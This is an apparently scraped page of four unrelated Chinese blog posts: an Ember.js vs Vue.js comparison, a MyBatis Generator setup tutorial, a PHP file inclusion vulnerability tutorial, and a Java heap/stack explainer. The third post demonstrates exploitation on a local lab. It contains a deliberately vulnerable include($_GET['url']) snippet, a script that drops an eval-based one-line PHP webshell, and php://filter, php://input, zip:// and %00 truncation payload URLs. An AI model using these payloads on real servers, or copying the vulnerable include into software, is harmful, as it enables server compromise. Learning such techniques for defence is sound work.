本文由葡萄城技術團隊於博客園翻譯並首發

轉載請註明出處：，葡萄城為開發者提供專業的開發工具、解決方案和服務，賦能開發者。

JavaScript最初是為Web應用程序創建的。但是隨着前端技術的發展，大多數開發人員更喜歡使用基於JavaScript的框架。它簡化了你的代碼以及使你能完成更多全棧工作，您幾乎可以在任何框架中使用JavaScript。

使用什麼類型的框架決定了創建應用程序的便捷程度。因此，您必須慎重選擇。在已經足夠複雜的前端環境里，其中兩個框架脫穎而出。我們會在本文中對Ember.js和Vue.js之間進行對比，以幫助你更好的做出判斷。

為什麼要選擇框架？

在開始比較這兩個框架之前，我們應該先來了解下選擇一個框架的決定因素都有什麼。每個開發人員選擇一個框架之前，讓我們看看選擇的理由。

• 代碼必須簡單易懂。
• 應以更少的代碼量產出更多的功能。
• 應提供一個布局合理的工作框架。
• 是否支持內置路由或外部插件的路由？
• 應該能夠在頁面加載時傳輸更多數據，從而使頁面成為單頁應用，單頁應用程序使用體驗顯然更好。
• 在單頁架構中，如果用戶需要共享應用子頁面鏈接，那麼框架應該具有基於URL路由不同功能的能力。
• 更嚴格的模板選項有助於實現雙向綁定。
• 不應與任何第三方庫產生衝突。
• 應該很容易測試框架內的代碼。
• 應為Ajax調用提供HTTP客戶端服務
• 文檔也必不可少，應該是完整且最新。
• 應該與瀏覽器的最新版本兼容。
• 必須滿足上述條件，便於APP的構建。您必須確保所選擇的框架符合條件。

Vue.js

開發人員總是在尋找新的框架來構建他們的應用程序。主要要求是速度快、成本低。這個框架應該很容易被新開發人員理解並且能夠以更低的成本使用。其他考慮選項還有簡單的編碼方式、健全的幫助文檔等。

在Web應用程序開發中，VUEJS在軟件語言方面結合了很多優點。VUE.JS的體繫結構易於使用。使用VUE.JS開發的應用程序很容易與新的應用程序集成。

VUE.JS是一個非常輕量級的框架。你能很快的下載到它。它也比其他框架快得多。該框架的單文件組件性質也很棒。這個尺寸使它很受歡迎。

同時你可以進一步減少它的體積。使用Vue.js可以將模板和編譯器分離為虛擬DOM。您只能部署只有12 KB的壓縮后的壓縮解釋器。您可以在您的機器中編譯模板。

Vue.js的另一個重要優點是它可以輕鬆地與使用JavaScript創建的現有應用程序集成。使用此框架可以輕鬆地對已經存在的應用程序進行更改。

Vue.js還可輕鬆與其他前端庫集成。您可以插入另一個庫，以彌補此框架中的任何不足。此功能使該工具成為通用工具。

Vue.js使用服務器端渲染流的方法。它使服務器具有較高的響應速度。 你的用戶將很快獲得渲染的內容。

Vue.js非常適合SEO。由於該框架支持服務器端渲染，因此視圖直接在服務器上渲染。便於搜索引擎直接索引到這些網頁內容。

但對你來說最重要的是你可以輕鬆地學習Vue.js。該結構是基本的。即使是新的開發人員，也會發現使用它來構建應用程序很容易。該框架有助於開發大型和小型模板。它有助於節省大量時間。

您可以返回並輕鬆檢查錯誤。除了測試組件外，您還可以返回並檢查所有狀態。就任何開發人員而言，這是另一個重要功能。

Vue.js也有非常詳細的文檔。它有助於為你快速上手開發應用程序。您可以使用HTML或JavaScript的基本知識來構建網頁或應用。

• Vue.js它能與其他應用程序集成
• Vue.js輕巧且快速。通過部署解釋器，就可以使它更輕量
• 您可以將編譯器和模板分離為虛擬DOM。
• 得益於便於集成的優點，您可以使用它來對現有應用進行更改
• 豐富的庫和組件為你的應用程序帶來更多可能
• 應用能夠快速響應。
• 服務器端渲染還有助於使搜索引擎排名更高。
• 結構簡單。易於任何新開發者使用
• 您可以返回檢查並更正錯誤。
• 您可以檢查所有現有狀態。
• 詳細的文檔有助於快速構建網頁或應用程序。

Ember.js

Ember.js是MVVM模型框架。它是開源軟件。該平台主要用於創建複雜的多頁面應用程序。它保持最新的特性，並不會丟棄任何舊功能。

通過這個框架，您必須嚴格遵循框架的體繫結構。JS框架是非常嚴密的組織。所以它降低了和其他框架可能提供的靈活性。

它的平台和工具有非常完善的控制系統。您可以使用提供的工具將其與新版本集成，以避免使用過時的API。

您可以輕鬆了解Ember的API。他們也很容易工作。您可以簡單，直接地使用高度複雜的功能。

當類似的工作一起處理時，性能更好。它創建了相似的綁定和DOM更新，讓瀏覽器一次性處理它們，以提高性能。這樣則將避免為每個工作重複計算，以免浪費大量時間。

因為Promise無處不在，所以你可以以簡單的方式編寫代碼和模塊，使用 Ember 的任何 API。

同時Ember也有一個很不錯的上手指南。上面記錄著API的使用方式。Ember明確了一般應用程序的組織和結構，因此你將不會犯任何錯誤。你將不可能在不必要的情況下使程序複雜化。Ember的模板語言是Handlebar，Handlebar簡潔的語法可以使你可以輕鬆閱讀和理解模板，同樣的也能使頁面加載速度變得更快。使用Handlebar另一個優勢是，不必每次在頁面上添加或刪除數據時都更新模板。語言本身將自動為你完成。

最後，Ember.js擁有一個活躍的社區，可以定期更新框架並從而促進向後兼容

• Ember.js是適用於複雜結構的多頁應用程序的MVVM模型開源框架。
• 同時提供了最新功能和舊的功能。
• 它有一個非常嚴密的結構框架，不能提供太高的靈活性
• 非常完善的控制系統可幫助你與新版本完美集成。
• 對避免使用過時的API版本有着嚴格的指導。
• Ember的API可幫助您以簡單的方式使用複雜的功能
• 該框架提供高效的運算機制，以保證運行效率
• Promise可讓你使用Ember.js的任何API來編寫模塊化和簡單的代碼。
• Ember.js是一個完全加載的前端框架。
• 框架穩定，因為所有組件都具有相同的功能和屬性。
• 具有明確定義的限制，可防止您使應用程序複雜化
• Handlebar使你可以輕鬆閱讀和理解模板。並且還有助於更快地加載模板。
• 每次添加或刪除數據時，Handlebar將確保更新模板。
• Ember.js有一個活躍的社區，可以定期更新框架並從而促進向後兼容。

Ember.js Vue.js對比

當你需要將原有應用程序向現代框架上遷移時，Vue.js可以為您提供幫助。它結合了其他框架的許多優點。Vue.js面向開發過程的框架，所以沒有提供現成的界面元素庫。但是，許多第三方社區庫可以為您提供幫助。

Ember.js為您提供了一個值得信賴的成熟框架。當你的開發團隊規模很大時，這個框架比較合適。由於MVVM結構所致，它使每個人都可以為項目做出貢獻。

Vue.js可以幫助你兼容應用程序中不同類型的語法，它有助於輕鬆編寫代碼，同時由於後端渲染，它也是一個對SEO友好的框架。而Ember是一個完全加載的前端框架，可以幫助您非常快速地開發應用程序。但是它不適合開發小型項目。

很難說誰比誰更具優勢。選擇哪個框架將取決於你實際參与的項目類型是什麼。兩者都有其優缺點，所以我為大家總結了一張表，也許它能幫助你更好地進行對比：

 

總結

選擇什麼，取決於您要開發的應用程序。這兩個框架都在發展中。兩者也都在更新。

雖然Ember是一個全棧框架，但它太複雜了，很難應用於較小的項目。而Vue.js憑藉著輕盈的體量，易於上手的特點，使開發應用程序變得異常高效，從而獲得了不少行業的開發者的青睞。

此外，無論選擇什麼類型的框架，葡萄城都為廣大開發者提供了兼容各類框架的開發組件，例如：和 ，為開發者賦能。

 

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

※南投搬家費用,距離,噸數怎麼算?達人教你簡易估價知識!

目錄

之前的文章介紹了XML配置方式整合的過程，本文介紹下利用Mybatis-generator生成xml、dao、entity的過程。

一、MyBatis Generator簡介

MyBatis Generator是MyBatis官方提供的代碼生成器，可以生成xml、dao、entity。

官網介紹見：http://mybatis.org/generator/

二、使用方式

MyBatis Generator的使用方式有4種：

• 命令行生成
• Maven方式生成
• 使用Ant任務生成
• 使用Java代碼生成

本文將使用Intel IDEA+Maven方式生成代碼，因為集成和使用比較簡單，配置完成后直接雙擊運行即可。

三、實戰

首先新建一個SpringBoot項目spring-mybatis-generator，然後按照下面步驟操作。

1. pom.xml中配置plugin

<!-- 引入mybatis-generator 插件 -->
<plugin>
    <groupId>org.mybatis.generator</groupId>
    <artifactId>mybatis-generator-maven-plugin</artifactId>
    <version>1.3.2</version>
    <configuration>
        <!-- mybatis-generator的配置文件，根據情況調整位置 -->
        <configurationFile>src/main/resources/mybatis-generator.xml</configurationFile>
        <verbose>true</verbose>
        <overwrite>true</overwrite>
    </configuration>
    <executions>
        <execution>
            <id>Generate MyBatis Artifacts</id>
            <goals>
                <goal>generate</goal>
            </goals>
        </execution>
    </executions>
    <dependencies>
        <dependency>
            <groupId>org.mybatis.generator</groupId>
            <artifactId>mybatis-generator-core</artifactId>
            <version>1.3.2</version>
        </dependency>
    </dependencies>
</plugin>

1. 修改mybatis-generator.xml文件

上一步pom.xml中指定了一個配置文件，所以在resources目錄下新建mybatis-generator.xml，MyBatis Generator通過這個配置文件才可以進行如下操作：

• 如何連接到數據庫
• 生成什麼對象，以及如何生成它們
• 哪些表應用於對象生成

完整內容下面會有，需要注意的是。

JDBC驅動jar的路徑一定要寫絕對路徑。
JDBC驅動jar的路徑一定要寫絕對路徑。
JDBC驅動jar的路徑一定要寫絕對路徑。

重要的事情說3遍。

mybatis-generator.xml完整內容如下：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE generatorConfiguration
        PUBLIC "-//mybatis.org//DTD MyBatis Generator Configuration 1.0//EN"
        "http://mybatis.org/dtd/mybatis-generator-config_1_0.dtd">
<generatorConfiguration>

    <!--JDBC驅動jar包的 絕對路徑 -->
    <!--JDBC驅動jar包的 絕對路徑 -->
    <!--JDBC驅動jar包的 絕對路徑 -->
    <classPathEntry location="C:\Users\java_suisui\.m2\repository\mysql\mysql-connector-java\5.1.39\mysql-connector-java-5.1.39.jar"/>

    <!--defaultModelType="flat" 大數據字段，不分表 -->
    <context id="Mysql" targetRuntime="MyBatis3Simple" defaultModelType="flat">
        <property name="autoDelimitKeywords" value="true" />
        <property name="beginningDelimiter" value="`" />
        <property name="endingDelimiter" value="`" />
        <property name="javaFileEncoding" value="utf-8" />
        <plugin type="org.mybatis.generator.plugins.SerializablePlugin" />

        <plugin type="org.mybatis.generator.plugins.ToStringPlugin" />

        <!-- 註釋 -->
        <commentGenerator >
            <property name="suppressAllComments" value="true"/><!-- 是否取消註釋 -->
            <property name="suppressDate" value="true" /> <!-- 是否生成註釋代時間戳-->
        </commentGenerator>

        <!--數據庫鏈接地址賬號密碼-->
        <jdbcConnection driverClass="com.mysql.jdbc.Driver"
                        connectionURL="jdbc:mysql://localhost:3306/demo"
                        userId="root"
                        password="123456">
        </jdbcConnection>

        <!-- 類型轉換 -->
        <javaTypeResolver>
            <!-- 是否使用bigDecimal， false可自動轉化以下類型（Long, Integer, Short, etc.） -->
            <property name="forceBigDecimals" value="false"/>
        </javaTypeResolver>

        <!--生成Model類存放位置-->
        <javaModelGenerator targetPackage="com.example.springbootmybatis.generator.entity" targetProject="src/main/java">
            <property name="enableSubPackages" value="true"/>
            <property name="trimStrings" value="true"/>
        </javaModelGenerator>

        <!-- 生成mapxml文件 -->
        <sqlMapGenerator targetPackage="mapper" targetProject="src/main/resources" >
            <property name="enableSubPackages" value="false" />
        </sqlMapGenerator>

        <!-- 生成mapxml對應client，也就是接口dao -->
        <javaClientGenerator targetPackage="com.example.springbootmybatis.generator.dao" targetProject="src/main/java" type="XMLMAPPER" >
            <property name="enableSubPackages" value="false" />
        </javaClientGenerator>

        <table tableName="user" enableCountByExample="true" enableUpdateByExample="true" enableDeleteByExample="true" enableSelectByExample="true" selectByExampleQueryId="true">
            <generatedKey column="id" sqlStatement="Mysql" identity="true" />
        </table>

        <table tableName="user_role" enableCountByExample="true" enableUpdateByExample="true" enableDeleteByExample="true" enableSelectByExample="true" selectByExampleQueryId="true">
            <generatedKey column="id" sqlStatement="Mysql" identity="true" />
        </table>

    </context>
</generatorConfiguration>

1. 生成代碼

點擊IntelIDEA右側的“Maven Projects”，找到spring-boot-mybatis-generator下面的mybatis-generator:generate，雙擊運行，日誌中出現“BUILD SUCCESS”說明代碼已生成。

運行截圖：

生成代碼截圖：

運行日誌：

[INFO] Scanning for projects...
[INFO]                                                                         
[INFO] ------------------------------------------------------------------------
[INFO] Building spring-boot-mybatis-generator 0.0.1-SNAPSHOT
[INFO] ------------------------------------------------------------------------
[INFO] 
[INFO] --- mybatis-generator-maven-plugin:1.3.2:generate (default-cli) @ spring-mybatis-generator ---
[INFO] Connecting to the Database
[INFO] Introspecting table user
log4j:WARN No appenders could be found for logger (org.mybatis.generator.internal.db.DatabaseIntrospector).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.
[INFO] Introspecting table user_role
[INFO] Generating Record class for table user
[INFO] Generating Mapper Interface for table user
[INFO] Generating SQL Map for table user
[INFO] Generating Record class for table user_role
[INFO] Generating Mapper Interface for table user_role
[INFO] Generating SQL Map for table user_role
[INFO] Saving file UserMapper.xml
[INFO] Saving file UserRoleMapper.xml
[INFO] Saving file User.java
[INFO] Saving file UserMapper.java
[INFO] Saving file UserRole.java
[INFO] Saving file UserRoleMapper.java
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------

到此利用mybatis-generator自動生成代碼已經全部介紹完成了，有問題歡迎留言溝通哦！

完整源碼地址：

推薦閱讀

限時領取免費Java相關資料，涵蓋了Java、Redis、MongoDB、MySQL、Zookeeper、Spring Cloud、Dubbo/Kafka、Hadoop、Hbase、Flink等高併發分佈式、大數據、機器學習等技術。
關注下方公眾號即可免費領取：

本文由博客一文多發平台 發布！

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※想知道網站建置、網站改版該如何進行嗎?將由專業工程師為您規劃客製化網頁設計及後台網頁設計

※不管是台北網頁設計公司、台中網頁設計公司，全省皆有專員為您服務

※Google地圖已可更新顯示潭子電動車充電站設置地點!!

※帶您來看台北網站建置，台北網頁設計，各種案例分享

文件包含漏洞原理淺探

By : Mirror王宇陽

E-mail : mirrorwangyuyang@gmail.com

聯繫方式: 2821319009 (QQ)

個人主頁: https://www.cnblogs.com/wangyuyang1016/

文件包含

文件包含是指一個文件裡面包含另外一個文件；開發過程中，重複使用的函數會寫入單獨的文件中，需要使用該函數的時候直接從程序中調用該文件即可，這一個過程就是“文件包含”

由於文件包含的功能特性，導致客戶端可以調用一個惡意文件，進行動態調用

PHP文件包含

PHP提供了四個文件包含函數提供的功能強大且靈活多變，經常存在文件包含函數

危險包含函數(PHP)

include()

無法查到被包含的文件時產生錯誤”E_COMPLE_ERROR”停止運行

include_once()

和前者一樣，如果文件中的代碼已經包含了，則不再會包含

require()

無法查到被包含的文件是產生警告”E_WARNING”繼續運行

require_once()

和前者一樣，無法查到被包含的文件是產生警告”E_WARNING”繼續運行

文件包含實例

開發演示

<?php
    include("ArrayUtil.php"); //利用include函數包含
    $arr = array("sougou","google","yahoo","baidu","FackBook");
    PrintArr($arr);
?>

<?php
    function PrintArr($arr,$sp=' ==> ',$lin="<br/>"){
        foreach ($arr as $key => $value) {
            echo "$key $sp $value $lin";
        }
    }
?>

在index.php文件中使用include函數文件包含ArrayUtil.php文件，在index.php中可以使用ArrayUtil.php文件中的PrintArr()函數；在index.php第4行我們調用了PrintArr()函數。

使用瀏覽器訪問index.php

漏洞演示（本地執行）

<?php
    include("phpinfo.txt");
?>

<?php
    phpinfo();
?>

喏！一個txt文件被成功包含了；筆者測試了其它各種服務器可接受的文件格式，均實驗成功！由此筆者得到的論證是：include()函數包含的任何文件都會以PHP文件解析，但前提是文件的內容符合PHP代碼規範；若內容不符合PHP代碼規範則會在頁面暴露文件內容（這是重點）

漏洞演示（遠程執行）

PHP不單單可以在服務端（本地）執行文件包含，也可以遠程執行文件包含；

遠程的文件包含執行需要修改PHP.ini配置文件（php默認關閉遠程包含文件）

allow_url_include = on

由於我們不具備遠程條件，只好本地搭建環境將就一下哈！！！

D:\phpStudy\phpinfo.txt

<?php
    phpinfo();
?>

127.0.0.1/index.php

<?php
    include("D:\phpStudy\phpinfo.txt");
?>

換一個方法

<?php
    include($_GET['url']);
?>// 記住這個代碼後面會一直使用

這裏的URL參數值提交的只是一個遠程包含文件的URL地址；遠程文件包含和本地文件包含的解析方法一樣，只要符合PHP代碼規範就可以按照PHP代碼解析執行。

如果我們包含的文件不存在，則會發生Error，網站的路徑就會暴露！

PHP文件包含漏洞基本利用

讀取敏感文件

構造類似http://127.0.0.1/?url=.\phpinfo.txt

喏！我們看見了文本內容，為什麼呢？

因為include()函數會執行文件包含，不管是什麼格式的文件只要符合PHP代碼規範的內容就會按照PHP解析；而不符合PHP代碼規範的則會直接輸出文件內容。

綜合特性：利用該特性包含文件的方法，訪問本地的其它文件均會執行php解析或者回顯文本的內容；尤其是系統敏感文件，例如php.ini配置文件、my.ini配置文件等敏感信息，而文件的路徑則需要結合其它姿勢來獲得（例如上面利用error回顯的方式）

重要的一點：得具有文件的操作權限哦

遠程包含Shell

遠程包含文本的條件是 allow_url_fopen= on

創建shell.txt（功能:在服務端本地創建一句話木馬腳本）

<?php
    $key= ("<?php @eval(\$_POST['mirror']);?>");//$符號需要轉義要按字符存
    $file = fopen("shell.php","w");
    fwrite($file, $key);
    fclose($file);
?>

構造：http://127.0.0.1/?url=..\xx\shell.txt

遠程包含文本執行成功后，服務端本地會創建一個”shell.php”一句話木馬執行文件

shell.php創建后，使用“菜刀”連接一句話：

喏！包含執行文件創建本地一個shell.php一句話木馬，然後菜刀連木馬！一梭子搞定！

文件包含配合上傳

利用web應用的上傳功能，上傳一張偽木馬圖片，然後利用文件包含執行已上傳的圖片，然後偽木馬圖片的功能就是被包含執行后在服務端本地創建一個木馬執行php文件

PHP封裝協議利用

PHP內置很多的，封裝協議的功能和文件函數（fopen(),copy(),file_exists(),filesize()）提供的功能相似

allow_url_fopen：on 默認開啟 該選項為on便是激活了 URL 形式的 fopen 封裝協議使得可以訪問 URL 對象文件等。

allow_url_include：off 默認關閉，該選項為on便是允許 包含URL 對象文件等

考慮安全都是全部關閉

【引用官方文檔】

• — 訪問本地文件系統
• — 訪問 HTTP(s) 網址
• — 訪問 FTP(s) URLs
• — 數據（RFC 2397）
• — 查找匹配的文件路徑模式
• — PHP 歸檔
• — Secure Shell 2
• — RAR
• — 音頻流
• — 處理交互式的流

file://協議：

訪問本地文件系統

file://[本地文件的絕對路徑和文件名]

訪問各個IO流

需要開啟 allow_url_include: on

• php://stdin：直接訪問PHP進程相應的輸入或輸出流（只讀）

• php://stdout：直接訪問PHP進程相應的輸入或輸出流（只寫）

• php://stderr：直接訪問PHP進程相應的輸入或輸出流（只寫）

• php://filter：進行任意文件讀取的利用

• php://input：訪問請求的原始數據的只讀流，將post請求中的數據作為php解析

• php://output：只寫的數據流，允許print和echo方式寫入到輸出緩存中

• php://fd： 允許直接訪問指定的文件描述符

  更多詳細可以參考官方php://協議文檔

zip://協議：

（zip:// , bzip2:// , zlib:// ）屬於壓縮流，可以訪問壓縮文件中的子文件，更重要的是不需要指定後綴名

zip:// [壓縮文件絕對路徑]#[壓縮文件內的子文件名]

注意 井字符號 ’ # ‘ 在url中需要轉為 %23

allow_utl_include= On

data://text/plain;base64,[string_base64加密后]

：

查詢匹配的文件路徑模式

glob://[url]

<?php
// 循環 ext/spl/examples/ 目錄里所有 *.php 文件
// 並打印文件名和文件尺寸
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>

：

處理交互式數據流（默認未開啟，需要安裝PECL—Expect擴展）

expect://command

參見文章：

讀取PHP文件

利用file://讀取文件內容

file://[本地文件的絕對路徑和文件名]

利用php://filter讀取php文件內容

http://127.0.0.1/?url=php://filter/read=convert.base64-encode/resource=shelll.php

這裏的結果是經過Base64加密的

寫入PHP文件

利用php://input：

使用php://input可以執行PHP語句，但是受限於allow_utl_include= On

url text:

http://127.0.0.1/index.php/?url=php://input

Post data:

<?php phpinfo();?>

喏！利用“php://input”執行php代碼”post data數據內容“，這裏只是回顯phpinfo()，如果我們利用php://input執行服務端本地創建php一句話木馬文件，後果可想而知

利用data://：

受限於allow_utl_include= Onphp.ini配置

?file=[data://text/plain;base64,[base64編碼加密的payload)]

注意沒有php閉合標籤

利用zip://:

?url=zip://C:\Users\Mirror\Desktop/zip.zip%23shell.php

總結

上面這張圖是筆者從FREEBUF漏斗社區的文章中copy來的，算是一個不錯的總結^_^

截斷包含

magic_quotes_gpc = off函數為Off狀態才可以使用，因為在On狀態下%00會被轉義導致無法截斷；https://www.cnblogs.com/timelesszhuang/p/3726736.html

PHP6/7關閉了magic_quotes_gpc函數:

文件包含的漏洞修復，尤其是include()相關文件包含函數，只要限制後綴名就好了？

<?php
    if(iset($_GET['url'])){
            include $_GET['url'].".php";
    } else{
        include 'home.php';
    }
?>

上述程序就是固定限制後綴名，用戶只需要指明文件名就可以，不需要用戶提交後綴名

現在我們利用之前的包含手段，包含”shell.php”文件

http://127.0.0.1/index.php/?url=shell.php

由於程序固定了文件後綴格式，於是在後台會構成

shell.php.php

而include()無法查找到“shell.php.php”，故此導致報錯

採用字節截斷

http://127.0.0.1/index.php/?url=shell.php%00

PHP5.2+的版本漸漸的都修復了字節截斷，所以很少有利用了

筆者不做過多的細節說明^_^

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※廣告預算用在刀口上，網站設計公司幫您達到更多曝光效益

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※南投搬家前需注意的眉眉角角，別等搬了再說!

堆與棧

關於堆和棧的問題，對於熟悉C++的同學來說可能理解的比較清楚，但是由於Java的一切對象都是在堆上，因此有時候可能反而會比較迷惑，比如：

為什麼要分堆和棧？

堆和棧的區別是什麼？

為什麼堆是線程共享的而棧不是？

很多懂一點Java的人甚至是懂一點編程的人都知道內存一般分為堆和棧，棧由系統進行關係，而堆由程序員自己管理，…balabala，基本任何一本語言基礎書都會提到這些特點，但是你有想過為什麼嗎？

為什麼要分堆和棧

之所以要區分堆和棧，是由於程序需要兩種不同特性的內存形似而確定的。在C++中，新建一個對象有兩種方式，靜態分配和動態分配，

靜態分配

一般來說，靜態分配用於初始化已知對象大小的時候，比如int a[10];如果我們能夠確定這個數組是10個，我們可以使用這種方式。這種方式所需要的內存在編譯期間即可確定，因此操作系統便可以預先確定所指定大小內存給變量，並且可以在變量生命周期結束后自動釋放。

動態分配

然而在某些場景下，可能需要根據某些情況來申請內存，比如int* a =new int[count];而變量count可能就來自於某個配置文件或者用戶手動輸入的值。這個時候操作系統就無法再預先確定內存大小，並且不執行到new int[count]這一行代碼的時候，是無法知道所要分配的內存大小，因此操作系統分出一塊內存，用來進行動態分配。並且規定，動態分配的內存需要由客戶端自行管理。

Java 中的堆

由於JVM規範中規定，JVM中的一切對象都存儲在堆上(內存逃逸除外)。因此在Java中並不存在對象的靜態分配，因此堆和棧的來源看似就非常理所當然。但是要明白，在操作系統中，堆和棧的出現的緣由。

堆和棧的區別

知道了為什麼要區分堆和棧，再來看看堆和棧的區別。

• 堆是運行時確定內存大小，而棧在編譯時即可確定內存大小

  理由便是第一節中提到的，這是區分堆和棧的初衷

• 堆內存由用戶管理(Java中由JVM管理)，棧內存會被自動釋放

• 棧實現方式採用數據結構中的棧實現，具有(LIFO)的順序特點，堆為一塊一塊的內存

• 棧由於其實現方式，在分配速度上比堆快的多。分配一塊棧內存不過是簡單的移動一個指針

• 在JVM中，棧不會被程序員直接使用，程序員操作的一般都是堆。

• 棧為線程私有而堆為線程共享

雖然堆和棧有這麼多的區別，但是這些區別都是由於操作系統而決定的，在硬件上，他們本質都是RAM

為什麼堆是線程共享的而棧不是？

上面最後一點提到了棧為線程私有而堆為線程共享。這是為什麼呢？？？

其實很簡單，為了解決一個問題：線程間通信。

想要實現線程間通信，目前有兩種方法：

• 消息傳遞
• 共享內存

共享內存便是我們所說的將堆設置為線程間共享的，這樣我們能夠通過堆中的對象實現數據共享，這樣便使得其他線程能夠知道某個線程修改了某個數據。但是這樣帶來的問題可能就有線程安全問題等，但是這樣做的優勢便在於速度更快和節約內存，Java，C#等使用這種方式

消息傳遞是每個線程都私有自己的數據空間，當需要線程通信的時候，便需要一個線程显示的給另外一個線程發送具體的消息，這樣做的能夠讓多線程更加安全，但是私有的線程空間和消息傳遞帶來的是需要給內個線程都拷貝相同的對象，變量等，並且可能會帶來效率問題。而Erlang和JoCaml便是使用消息傳遞式線程通信。

尊重勞動成功，轉載註明原創

參考文章：

如果覺得寫得不錯，歡迎關注微信公眾號：逸游Java ,每天不定時發布一些有關Java進階的文章，感謝關注

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站，提高曝光率!!

※網頁設計一頭霧水??該從何著手呢? 找到專業技術的網頁設計公司，幫您輕鬆架站!

※想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師”嚨底家”!!